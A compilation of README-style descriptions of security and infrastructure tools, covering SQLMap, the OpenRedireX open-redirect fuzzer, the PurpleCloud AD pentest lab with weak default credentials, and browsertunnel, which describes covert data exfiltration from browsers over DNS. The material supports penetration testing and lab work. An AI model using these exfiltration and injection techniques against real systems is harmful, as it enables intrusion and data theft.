
Hardcodes - Find Hardcoded Strings From Source Code


hardcodes is a utility for finding strings hardcoded by developers in source code. It uses a modular tokenizer that can handle comments, any number of backslashes, and nearly any syntax you throw at it.
Yes, it is designed to process any syntax, and the following languages are officially supported:
ada, applescript, c, c#, c++, coldfusion, golang, haskell, html, java, javascript,
jsp, lua, pascal, perl, php, powershell, python, ruby, scala, sql, swift, xml

Installation

with pip
pip3 install hardcodes

or build from source
git clone https://github.com/s0md3v/hardcodes && cd hardcodes && python3 setup.py install

For Developers
The sample program below demonstrates usage of the hardcodes library:
from hardcodes import search

string = "console.log('hello there')"
result = search(string, lang="common", comments="parse")
print(result)
Output: ['hello there']
The arguments lang and comments are optional. Their use is explained below in the user documentation section.
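For example, a minimal sketch combining both parameters (illustrative only; exact results depend on the tokenizer):
from hardcodes import search

source = "// token below\nvar key = 'sk_live_1234';"

# comments controls how comments are treated: "ignore" drops them,
# "parse" tokenizes them like code, "string" returns whole comments
# as hardcoded strings.
for mode in ("ignore", "parse", "string"):
    print(mode, search(source, lang="javascript", comments=mode))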

For Users
cli.py provides a grep-like command line interface to the hardcodes library. You will need to install the library first to use it.

Find strings in a file
python cli.py /path/to/file.ext

Find strings in a directory, recursively
python cli.py -r /path/to/dir

Hide paths from output
python cli.py -o /path/to/file.ext

Specify programming language
Specifying a language is optional and should be used only when the programming language of the source is already known.
python cli.py -l 'golang' /path/to/file.go

Specify comment behaviour
With the -c option, you can specify how comments are handled:
  • ignore: ignore the comments completely
  • parse: parse the comments like code
  • string: add comments to the list of hardcoded strings
python cli.py -c 'ignore' /path/to/file.ext



VPS-Docker-For-Pentest - Create A VPS On Google Cloud Platform Or Digital Ocean Easily With The Docker For Pentest


Create a VPS on Google Cloud Platform or Digital Ocean, with the docker-for-pentest image included, to launch an assessment against the target.

Requirements
  • Terraform installed
  • Ansible installed
  • SSH private and public keys
  • Google Cloud Platform or Digital Ocean account.

Usage

1.- Clone the repository
git clone --depth 1 https://github.com/aaaguirrep/vps-docker-for-pentest.git vps
cd vps

2.- Credentials

For Google Cloud Platform
  • Create a new project.
  • Create a service account with the "Compute Admin" role and download a key in JSON format into the credentials folder.
  • Rename the key to pentest.json
  • Enable "Compute Engine API" for the project.

For Digital Ocean
  • Create a personal access token with write permission and copy it. See Tutorial.

SSH Private and Public keys
  • Inside the credentials folder, run ssh-keygen -t rsa -f pentest in the terminal. An empty passphrase is OK.
  • It creates two files: the private and the public key.

3.- Terraform

Google Cloud Platform
  • Enter the gcp folder and modify the following value:
    • In the main.tf file, change the project value to your project-id.
  • Run the following commands:
# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x
  • Copy the external_ip value
Note: The instance type and region used are n1-standard-1 and us-central1. You can change the values in server.tf and main.tf.
Demo

Digital Ocean
  • Enter the digital-ocean folder.
  • With the personal access token copied, run export TF_VAR_do_token="Personal_Access_Token_Here"
  • Run the following commands:
# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x
  • Copy the external_ip value
Note: The droplet type and region used are s-2vcpu-4gb and nyc3. You can change the values in server.tf and variables.tf.
Demo

4.- Ansible
  • Enter the ansible folder.
  • In hosts.yaml, replace x.x.x.x with the copied external_ip value.
  • Run the following command:
$ ansible-playbook playbook.yaml
TASK [Configuration finished] *******************************************************
ok: [x.x.x.x] => {
"msg": "System configured correctly."
}
Demo

5.- Access to VPS
  • In the gcp or digital-ocean folder, run the following command, replacing x.x.x.x with the copied external_ip value.
# Access to VPS
$ ssh pentest@x.x.x.x -i ../credentials/pentest
Demo

6.- Destroy the VPS
  • In the gcp or digital-ocean folder, run the following command.
# Destroy the resource
$ terraform destroy -auto-approve
Note: For Digital Ocean, if you don't have a default VPC in the region used, an error is shown when destroying the VPC, but that is no problem: the other resources will still be destroyed.



Autovpn - Create On Demand Disposable OpenVPN Endpoints On AWS


Script that allows the easy creation of OpenVPN endpoints in any AWS region. Creating a VPN endpoint is done with a single command and takes ~3 minutes. It creates the proper security groups, spins up a tagged EC2 instance, and configures the OpenVPN software. Once the instance is configured, an OpenVPN configuration file is downloaded and ready to use. There is also functionality to see which instances are running in which region and the ability to terminate an instance when done. Additional functionality includes specifying the instance type, generating SSH keypairs, specifying a custom AMI, changing the login user, and more to come.
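For illustration only (this is not autovpn's actual code), spinning up a tagged EC2 instance of that kind with boto3 might look like the sketch below; the AMI ID and tag values are hypothetical:
import boto3

# assumes credentials in ~/.aws/credentials, as described under Dependencies
ec2 = boto3.client("ec2", region_name="us-east-1")
response = ec2.run_instances(
    ImageId="ami-00000000",   # hypothetical base AMI
    InstanceType="t2.micro",
    KeyName="us-east-1_vpnkey",
    MinCount=1,
    MaxCount=1,
    TagSpecifications=[{
        "ResourceType": "instance",
        "Tags": [{"Key": "Name", "Value": "autovpn"}],
    }],
)
print(response["Instances"][0]["InstanceId"])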

Use Case
  • Create on-demand OpenVPN endpoints in AWS that can easily be destroyed when done, so you only pay for what you use.

Dependencies
  1. Create a virtualenv:
mkvirtualenv -p python3 env/
source env/bin/activate
  2. Install dependencies by running pip install -r requirements.txt
  3. Ensure that you have an AWS credentials file by running:
vi ~/.aws/credentials
Then type in the following and add your keys (remove parentheses):
[default]
aws_access_key_id = (your_access_key_here)
aws_secret_access_key = (your_secret_key_here)
  4. Install the OpenVPN client (if needed)

Installation
  1. Ensure dependencies are all installed.
  2. Clone the repo to your system:
git clone https://github.com/ttlequals0/autovpn.git
  3. (Optional) To create an SSH keypair, execute autovpn with the -G and -r options for the AWS region of your choice. NOTE: Make sure to add the new key to your ssh-agent.
./autovpn -G -r us-east-1
  4. Execute autovpn with the -C, -k, and -r options to deploy to AWS:
./autovpn -C -r us-east-1 -k us-east-1_vpnkey
  5. OpenVPN config files are downloaded to the current working directory.
  6. Import the OpenVPN config file and connect:
sudo openvpn us-east-1_aws_vpn.ovpn

Man page
DESCRIPTION:
autovpn - On Demand AWS OpenVPN Endpoint Deployment Tool.
Project found at https://github.com/ttlequals0/autovpn
USAGE:
ACTION [OPTIONS]
-C Create VPN endpoint.
-D Delete keypair from region.
-G Generate new keypair.
-S Get all running instances in a given region.
-T Terminate an OpenVPN endpoint.
-d Specify custom DNS server. (ex. 4.2.2.1)
-h Displays this message.
-i AWS Instance type (Optional, Default is t2.micro)
t2.nano t2.micro t2.small t2.medium t2.large.**
-k Specify the name of AWS keypair (Required)
-m Allow multiple connections to same endpoint.
-r Specify AWS Region (Required)
us-east-1 us-west-1 us-east-2 us-west-2 eu-west-1 eu-west-2
eu-west-3 eu-central-1 eu-north-1 ap-southeast-1 ap-northeast-1
ap-northeast-2 ap-northeast-3 ap-southeast-2 sa-east-1
ap-east-1 ca-central-1 me-south-1
-p Specify custom OpenVPN UDP port
-u Specify custom ssh user.***
-y Skip confirmations
-z Specify instance id.
EXAMPLES:
Create OpenVPN endpoint:
autovpn -C -r us-east-1 -k us-east-1_vpnkey
Generate keypair in a region.
autovpn -G -r us-east-1
Get running instances
autovpn -S -r us-east-1
Terminate OpenVPN endpoint
autovpn -T -r us-east-1 -z i-b933e00c
Using custom options
autovpn -C -r us-east-1 -k us-east-1_vpnkey -a ami-fce3c696 -u ec2_user -i m3.medium
NOTES:
* - A custom AMI may be needed if changing the instance type.
** - Any instance size can be given, but the t2.micro is more than enough.
*** - A custom user might be needed if using a custom AMI.
**** - The AWS IAM user must have EC2 or Administrator permissions set.

To Do
  • Continue to update documentation
  • Add deletion of Security Group if it is no longer in use.
  • Add ability to create more client configs for one endpoint.
  • Pull Requests are welcome.


SQLMap v1.4.9 - Automatic SQL Injection And Database Takeover Tool


SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6, 2.7 and 3.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Links


OpenRedireX - Asynchronous Open redirect Fuzzer for Humans


A Fuzzer For OpenRedirect Issues.

Key Features :
  • Takes a url or list of urls and fuzzes them for Open redirect issues
  • You can specify your own payloads in 'payloads.txt'
  • Shows Location header history (if any)
  • Fast (as it is Asynchronous)
  • umm, that's it, nothing much!

Usage :
Note: Use Python 3.7+!
$ git clone https://github.com/devanshbatham/OpenRedireX
$ cd OpenRedireX
$ python3 -m venv env
$ source env/bin/activate
Note: The "FUZZ" keyword is important, and the URL must be in double quotes!
$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

For single URL :
$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

For List of URLs :
$ python3.7 openredirex.py -l urls.txt -p payloads.txt --keyword FUZZ
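Conceptually, the fuzzer substitutes every payload for the keyword and fires the requests asynchronously without following redirects, so the Location header can be inspected. A minimal sketch of that idea (not OpenRedireX's actual code):
import asyncio
import aiohttp

async def fuzz(template, payloads, keyword="FUZZ"):
    async with aiohttp.ClientSession() as session:
        for payload in payloads:
            url = template.replace(keyword, payload)
            # allow_redirects=False exposes the redirect target
            async with session.get(url, allow_redirects=False) as resp:
                print(resp.status, resp.headers.get("Location"), url)

asyncio.run(fuzz("https://vulnerable.com/?url=FUZZ",
                 ["//evil.example", "https://evil.example"]))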

Example :


Credits :
Thanks mate @NullPxl


PurpleCloud - An Infrastructure As Code (IaC) Deployment Of A Small Active Directory Pentest Lab In The Cloud


Pentest Cyber Range for a small Active Directory Domain. Automated templates for building your own Pentest/Red Team/Cyber Range in the Azure cloud! Purple Cloud is a small Active Directory enterprise deployment automated with Terraform / Ansible Playbook templates to be deployed in Azure. Purple Cloud also includes an adversary node implemented as a docker container remotely accessible over RDP.

Quick Fun Facts:
  • Deploys a pentest adversary Linux VM and Docker container (AriaCloud) accessible over RDP
  • Deploys one (1) Windows 2019 Domain Controller and three (3) Windows 10 Pro Endpoints
  • Automatically joins the three Windows 10 computers to the AD Domain
  • Uses Terraform templates to automatically deploy in Azure with VMs
  • Terraform templates write Ansible Playbook configuration, which can be customized
  • Automatically uploads Badblood (but does not install) if you prefer to generate thousands of simulated users https://github.com/davidprowe/BadBlood
  • Post-deployment Powershell script provisions three domain users on the 2019 Domain Controller and can be customized for many more
  • Domain Users: olivia (Domain Admin); lars (Domain User); liem (Domain User)
  • All Domain User passwords: Password123
  • Domain: RTC.LOCAL
  • Domain Administrator Creds: RTCAdmin:Password123
  • Deploys four IP subnets
  • Deploys intentionally insecure Azure Network Security Groups (NSGs) that allow RDP, WinRM (5985, 5986), and SSH from the Public Internet. Secure this as per your requirements. WinRM is used to automatically provision the hosts.
  • Post-deploy Powershell script that adds registry entries on each Windows 10 Pro endpoint to automatically log each username into the Domain as the respective user. This feature simulates a real AD environment with workstations with interactive domain logons, so when the simulated adversary attempts to RDP into the endpoints, they are met with an interactive domain logon session.

AriaCloud Pentest Container - Automated Deployment
This repo now includes a Terraform template and Ansible Playbook that automatically deploys AriaCloud into an Azure VM with remote access over RDP. You can also do a standalone deployment of AriaCloud from within this repo. For this option, navigate into the aria-cloud directory and see the README. For more information on the AriaCloud docker container and included pentest tools, navigate to https://github.com/iknowjason/AriaCloud.

Purple Cloud Deployment Instructions
Note: Tested on Ubuntu Linux 20.04
Requirements:
  • Azure subscription
  • Terraform: Tested on v0.12.26
  • Ansible: Tested on 2.9.6

Installation Steps
Note: Tested on Ubuntu 20.04
Step 1: Install Terraform and Ansible on your Linux system
Download and install Terraform for your platform --> https://www.terraform.io/downloads.html
Install Ansible
$ sudo apt-get install ansible
Step 2: Set up an Azure Service Principal on your Azure subscription that allows Terraform to automate tasks under your Azure subscription
Follow the exact instructions in this Microsoft link: https://docs.microsoft.com/en-us/azure/developer/terraform/getting-started-cloud-shell
These were the two basic commands that were run based on this link above:
az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/<subscription_id>"
and the command below. Note: from my testing, I needed to use a role of "Owner" instead of "Contributor"; the default Microsoft documentation shows a role of "Contributor", which resulted in errors.
az login --service-principal -u <service_principal_name> -p "<service_principal_password>" --tenant "<service_principal_tenant>"
Take note of the following which we will use next to configure our Terraform Azure provider:
subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""
Step 3: Clone this repo
$ git clone https://github.com/iknowjason/PurpleCloud.git
Step 4: Using your favorite text editor, edit the terraform.tfvars file for the Azure resource provider matching your Azure Service Principal credentials
cd PurpleCloud/deploy
vi terraform.tfvars
Edit these parameters in the terraform.tfvars file:
subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""
Your terraform.tfvars file should look similar to this but with your own Azure Service Principal credentials:
subscription_id = "aa9d8c9f-34c2-6262-89ff-3c67527c1b22"
client_id = "7e9c2cce-8bd4-887d-b2b0-90cd1e6e4781"
client_secret = ":+O$+adfafdaF-?%:.?d/EYQLK6po9`|E<["
tenant_id = "8b6817d9-f209-2071-8f4f-cc03332847cb"
Step 5: Run the commands to initialize terraform and apply the resource plan
$ cd PurpleCloud/deploy
$ terraform init
$ terraform apply -var-file=terraform.tfvars -auto-approve
This should start the Terraform automated deployment plan
Step 6: Optional: Unzip and run Badblood from C:\terraform directory (https://github.com/davidprowe/BadBlood)

Known Issues or Bugs
There are timing-related issues that are a WIP for me to debug and resolve. They are mentioned below with workarounds.
Sometimes one of the provisioning steps doesn't work with the DC. It is the terraform module that calls the Ansible Playbook which runs a Powershell script to add domain users. The error will look like this when running the steps:
module.dc1-vm.null_resource.provision-dc-users (local-exec): TASK [dc : debug] **************************************************************
module.dc1-vm.null_resource.provision-dc-users (local-exec): ok: [52.255.151.90] => {
module.dc1-vm.null_resource.provision-dc-users (local-exec): "results.stdout_lines": [
module.dc1-vm.null_resource.provision-dc-users (local-exec): "WARNING: Error initializing default drive: 'Unable to find a default server with Active Directory Web Services ",
module.dc1-vm.null_resource.provision-dc-users (local-exec): "running.'."
module.dc1-vm.null_resource.provision-dc-users (local-exec): ]
module.dc1-vm.null_resource.provision-dc-users (local-exec): }
If this happens, you can change into the modules/dc1-vm directory and immediately run the ansible playbook commands, as shown in README.ANSIBLE.txt: ansible-playbook -i hosts.cfg playbook.yml
If you run this command before the Windows 10 endpoints are provisioned, they will run just fine. If the entire script runs and you see this error, then you need to run the Ansible Playbook on the Windows server and all of the endpoints.
Sometimes the adversary will throw this error:
module.adversary1-vm.null_resource.ansible-deploy (local-exec): fatal: [40.121.138.118]: FAILED! => {"changed": false, "msg": "Failed to update apt cache: "}
To resolve the issue, change into the modules/adversary1-vm directory and run the Ansible Playbook commands shown in README.ANSIBLE.txt:
ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -i ./hosts.cfg --private-key ssh_key.pem ./playbook.yml
Sometimes the Windows 10 Endpoints don't automatically log into the domain via registry entry. I've traced this issue to a timing issue with the Domain Controller creation. The powershell script creating the three users does not run correctly. To resolve the issue, simply run the Ansible Playbooks in each module directory. The following should resolve the issue:
$ cd ../modules/dc1-vm/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-1/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-2/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-3/
$ ansible-playbook -i hosts.cfg playbook.yml

Credits
@ghostinthewires for his Terraform templates (https://github.com/ghostinthewires)
@mosesrenegade for his Ansible Playbook integration with Terraform + Powershell script (https://github.com/mosesrenegade)
@davidprowe for his Badblood (https://github.com/davidprowe/BadBlood)

Future Development
  • AWS Terraform Deployment
  • Blue Team - Endpoint visibility with Sysmon on endpoints
  • Blue Team - Endpoint visibility with Velociraptor agent on endpoints


Bpytop - Linux/OSX/FreeBSD Resource Monitor


Resource monitor that shows usage and stats for processor, memory, disks, network and processes.
Python port of bashtop.

Features
  • Easy to use, with a game inspired menu system.
  • Full mouse support: all buttons with a highlighted key are clickable, and mouse scroll works in process list and menu boxes.
  • Fast and responsive UI with UP/DOWN key process selection.
  • Function for showing detailed stats for selected process.
  • Ability to filter processes, multiple filters can be entered.
  • Easy switching between sorting options.
  • Send SIGTERM, SIGKILL, SIGINT to selected process.
  • UI menu for changing all config file options.
  • Auto scaling graph for network usage.
  • Shows message in menu if new version is available
  • Shows current read and write speeds for disks

Themes
Bpytop uses the same theme files as bashtop so any theme made for bashtop will work.
See themes folder for available themes.
The make install command places the default themes in /usr/local/share/bpytop/themes. User created themes should be placed in $HOME/.config/bpytop/themes.
Let me know if you want to contribute with new themes.

Support and funding
You can sponsor this project through github, see my sponsors page for options.
Or donate through paypal or ko-fi.
Any support is greatly appreciated!

Prerequisites

Mac Os X
Will not display correctly in the standard terminal! Recommended alternative: iTerm2.
Will also need to be run as superuser to display stats for processes not owned by the user.

Linux, Mac Os X and FreeBSD
For correct display, a terminal with support for 24-bit truecolor.
Also needs a UTF8 locale and a font that covers:
  • Unicode Block “Braille Patterns” U+2800 - U+28FF
  • Unicode Block “Geometric Shapes” U+25A0 - U+25FF
  • Unicode Block "Box Drawing" and "Block Elements" U+2500 - U+259F

Notice
Dropbear seems to be unable to set the correct locale, so if accessing bpytop over SSH, OpenSSH is recommended.

Dependencies
Python3 (v3.6 or later)
psutil module (v5.7.0 or later)

Optionals for additional stats
(Optional, OSX) osx-cpu-temp, needed to show CPU temperatures.

Screenshots
Main UI showing details for a selected process.

Main UI in mini mode.

Main menu.

Options menu.

Installation
PyPi packaging for installation with pip will be set up later.
If you want to help speed this up, help with setting up proper testing is welcome!

Dependencies installation Linux
Install python3 and git with a package manager of your choice.
Install psutil python module (sudo might be required)
python3 -m pip install psutil

Dependencies installation OSX
Install homebrew if not already installed
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
Install python3 if not already installed
brew install python3 git
Install psutil python module
python3 -m pip install psutil
Install optional dependency osx-cpu-temp
brew install osx-cpu-temp

Dependencies installation FreeBSD
Install with pkg and pip
sudo pkg install python3 git
sudo python3 -m ensurepip
sudo python3 -m pip install psutil

Manual installation Linux, OSX and FreeBSD
Clone and install
git clone https://github.com/aristocratos/bpytop.git
cd bpytop
sudo make install
To uninstall:
sudo make uninstall

Configurability
All options are changeable from within the UI. Config files are stored in the "$HOME/.config/bpytop" folder.

bpytop.cfg: (auto generated if not found)
"/etc/bpytop.conf" will be used as default seed for config file creation if it exists.
#? Config file for bpytop v. 1.0.0

#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="Default"

#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=2000

#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="cpu lazy"

#* Reverse sorting order, True or False.
proc_reversed=False

#* Show processes as a tree
proc_tree=False

#* Use the cpu graph colors in the process list.
proc_colors=True

#* Use a darkening gradient in the process list.
proc_gradient=True

#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=False

#* Check cpu temperature, needs "vcgencmd" on Raspberry Pi and "osx-cpu-temp" on MacOS X.
check_temp=True

#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="%X"

#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=True

#* Custom cpu model name, empty string to disable.
custom_cpu_name=""

#* Optional filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, otherwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter=""

#* Show graphs instead of meters for memory values.
mem_graphs=True

#* If swap memory should be shown in memory box.
show_swap=False

#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=True

#* If mem box should be split to also show disks info.
show_disks=True

#* Show init screen at startup, the init screen is purely cosmetical
show_init=True

#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=True

#* Enable start in mini mode, can be toggled with shift+m at any time.
mini_mode=False

#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=WARNING

Command line options: (not yet implemented)
USAGE: bpytop [argument]

Arguments:
    -m, --mini            Start in minimal mode without memory and net boxes
    -v, --version         Show version info and exit
    -h, --help            Show this help message and exit
    --debug               Start with loglevel set to DEBUG overriding value set in config

TODO


Browsertunnel - Surreptitiously Exfiltrate Data From The Browser Over DNS

Browsertunnel is a tool for exfiltrating data from the browser using the DNS protocol. It achieves this by abusing dns-prefetch, a feature intended to reduce the perceived latency of websites by doing DNS lookups in the background for specified domains. DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios.
It's an old technique—DNS tunneling itself dates back to the '90s, and Patrick Vananti wrote about using dns-prefetch for it in 2016, but as far as I can tell, browsertunnel is the first open source, production-ready client/server demonstrating its use. Because dns-prefetch does not return any data back to client javascript, communication through browsertunnel is only unidirectional. Additionally, some browsers disable dns-prefetch by default, and in those cases, browsertunnel will silently fail.


The project comes in two parts:
  1. A server, written in golang, functions as an authoritative DNS server which collects and decodes messages sent by browsertunnel.
  2. A small javascript library, found in the html/ folder, encodes and sends messages from the client side.

How it works
Browsertunnel can send arbitrary strings over DNS by encoding the string in a subdomain, which is forwarded to the browsertunnel server when the browser attempts to recursively resolve the domain.

Longer messages that cannot fit in one domain (253 bytes) are automatically split into multiple queries, which are reassembled and decoded by the server.
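As a rough illustration of that splitting idea (browsertunnel's actual wire format differs; the encoding and label sizes here are assumptions):
import base64

def to_queries(message, tunnel_domain, chunk=50):
    # DNS labels are capped at 63 bytes and full names at 253 bytes,
    # so encode the message and slice it into label-sized chunks.
    data = base64.b32encode(message.encode()).decode().rstrip("=").lower()
    labels = [data[i:i + chunk] for i in range(0, len(data), chunk)]
    # One query per chunk; a real client also adds message/sequence IDs
    # so the server can reassemble fragments in order.
    return ["%d.%s.%s" % (n, label, tunnel_domain)
            for n, label in enumerate(labels)]

for q in to_queries("some exfiltrated text", "t1.example.com"):
    print(q)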

Setup and usage
First, set up DNS records to delegate a subdomain to your server. For example, if your server's IP is 192.0.2.123 and you want to tunnel through the subdomain t1.example.com, then your DNS configuration will look like this:
t1  IN NS t1ns.example.com.
t1ns IN A 192.0.2.123
On your server, install browsertunnel using go get. Alternatively, compile browsertunnel on your own machine, and copy the binary to your server.
go get github.com/veggiedefender/browsertunnel
Next, run browsertunnel, specifying the subdomain you want to tunnel through.
browsertunnel t1.example.com
For full usage, run browsertunnel -help:
$ browsertunnel -help
Usage of browsertunnel:
-deletionInterval int
seconds in between checks for expired messages (default 5)
-expiration int
seconds an incomplete message is retained before it is deleted (default 60)
-maxMessageSize int
maximum encoded size (in bytes) of a message (default 5000)
-port int
port to run on (default 53)
For more detailed descriptions and rationale for these parameters, you may also consult the godoc.
Finally, test out your tunnel! You can use my demo page here or clone this repo and load html/index.html locally. If everything works, you should be able to see messages logged to stdout.
For real-world applications of this project, you may want to fork and tweak the code as you see fit. Some inspiration:
  • Write messages to a database instead of printing them to stdout
  • Transpile or rewrite the client code to work with older browsers
  • Make the ID portion of the domain larger or smaller, depending on the amount of traffic you get, and ID collisions you expect
  • Authenticate and encrypt messages for secrecy and tamper-resistance (remember that DNS is a plaintext protocol)



Rakkess - Kubectl Plugin To Show An Access Matrix For K8S Server Resources


Review Access - kubectl plugin to show an access matrix for server resources

Intro
Have you ever wondered what access rights you have on a provided kubernetes cluster? For single resources you can use kubectl auth can-i list deployments, but maybe you are looking for a complete overview? This is what rakkess is for. It lists access rights for the current user and all server resources, similar to kubectl auth can-i --list.
It is also useful to find out who may interact with some server resource. Check out the sub-command rakkess resource below.

Examples

Show access for all resources
  • ... at cluster scope
    rakkess
  • ... in some namespace
    rakkess --namespace default
  • ... with verbs
    rakkess --verbs get,delete,watch,patch
  • ... for another user
    rakkess --as other-user
  • ... for another service-account
    rakkess --sa kube-system:namespace-controller
  • ... and combine with common kubectl parameters
    KUBECONFIG=otherconfig rakkess --context other-context

Show subjects with access to a given resource [1]

  • ...globally in all namespaces (only considers ClusterRoleBindings)
    rakkess resource configmaps
  • ...in a given namespace (considers RoleBindings and ClusterRoleBindings)
    rakkess resource configmaps -n default
  • ...with shorthand notation
    rakkess r cm   # same as rakkess resource configmaps
  • ... with custom verbs
    rakkess r cm --verbs get,delete,watch,patch

Name-restricted roles
Some roles only apply to resources with a specific name. To review such configurations, provide the resource name as an additional argument. For example, show access rights for the ConfigMap called ingress-controller-leader-nginx in namespace ingress-nginx (note the subtle difference for nginx-ingress-serviceaccount compared to the previous example):


As rakkess resource needs to query Roles, ClusterRoles, and their bindings, it usually requires administrative cluster access.
Also see Usage.

Installation
There are several ways to install rakkess. The recommended installation method is via krew.

Via krew
Krew is a kubectl plugin manager. If you have not yet installed krew, get it at https://github.com/kubernetes-sigs/krew. Then installation is as simple as
kubectl krew install access-matrix
The plugin will be available as kubectl access-matrix, see doc/USAGE for further details.

Binaries
When using the binaries for installation, also have a look at doc/USAGE.

Linux
curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-linux.tar.gz \
&& tar xf rakkess-amd64-linux.tar.gz rakkess-amd64-linux \
&& chmod +x rakkess-amd64-linux \
&& mv -i rakkess-amd64-linux $GOPATH/bin/rakkess

OSX
curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-darwin.tar.gz \
&& tar xf rakkess-amd64-darwin.tar.gz rakkess-amd64-darwin \
&& chmod +x rakkess-amd64-darwin \
&& mv -i rakkess-amd64-darwin $GOPATH/bin/rakkess

Windows
https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-windows-amd64.zip

From source

Build on host
Requirements:
  • go 1.13 or newer
  • GNU make
  • git
Compiling:
export PLATFORMS=$(go env GOOS)
make all # binaries will be placed in out/

Build in docker
Requirements:
  • docker
Compiling:
mkdir rakkess && cd rakkess
curl -Lo Dockerfile https://raw.githubusercontent.com/corneliusweig/rakkess/master/Dockerfile
docker build . -t rakkess-builder
docker run --rm -v $PWD:/go/bin/ --env PLATFORMS=$(go env GOOS) rakkess-builder
docker rmi rakkess-builder
Binaries will be placed in the current directory.

Users
What are others saying about rakkess?
“Well, that looks handy! rakkess, a kubectl plugin to show an access matrix for all available resources.” (@mhausenblas)
“that's indeed pretty helpful. rakkess --as system:serviceaccount:my-ns:my-sa -n my-ns prints the access matrix of a service account in a namespace” (@fakod)
“THE BOMB. Love it.” (@ralph_squillace)
“This made my day. Well, not actually today but I definitively will use it a lot.” (@Soukron)

[1]: This mode was inspired by kubectl-who-can


Anchore Engine - A Service That Analyzes Docker Images And Applies User-Defined Acceptance Policies To Allow Automated Container Image Validation And Certification


For the most up-to-date information on Anchore Engine, Anchore CLI, and other Anchore software, please refer to the Anchore Documentation
The Anchore Engine is an open-source project that provides a centralized service for inspection, analysis, and certification of container images. The Anchore Engine is provided as a Docker container image that can be run standalone or within an orchestration platform such as Kubernetes, Docker Swarm, Rancher, Amazon ECS, and other container orchestration platforms.
The Anchore Engine can be accessed directly through a RESTful API or via the Anchore CLI.
With a deployment of Anchore Engine running in your environment, container images are downloaded and analyzed from Docker V2 compatible container registries and then evaluated against user-customizable policies to perform security, compliance, and best practices enforcement checks.

Anchore Engine can be used in several ways:
  • Standalone or interactively.
  • As a service integrated with your CI/CD to bring security/compliance/best-practice enforcement to your build pipeline
  • As a component integrated into existing container monitoring and control frameworks via integration with its RESTful API.
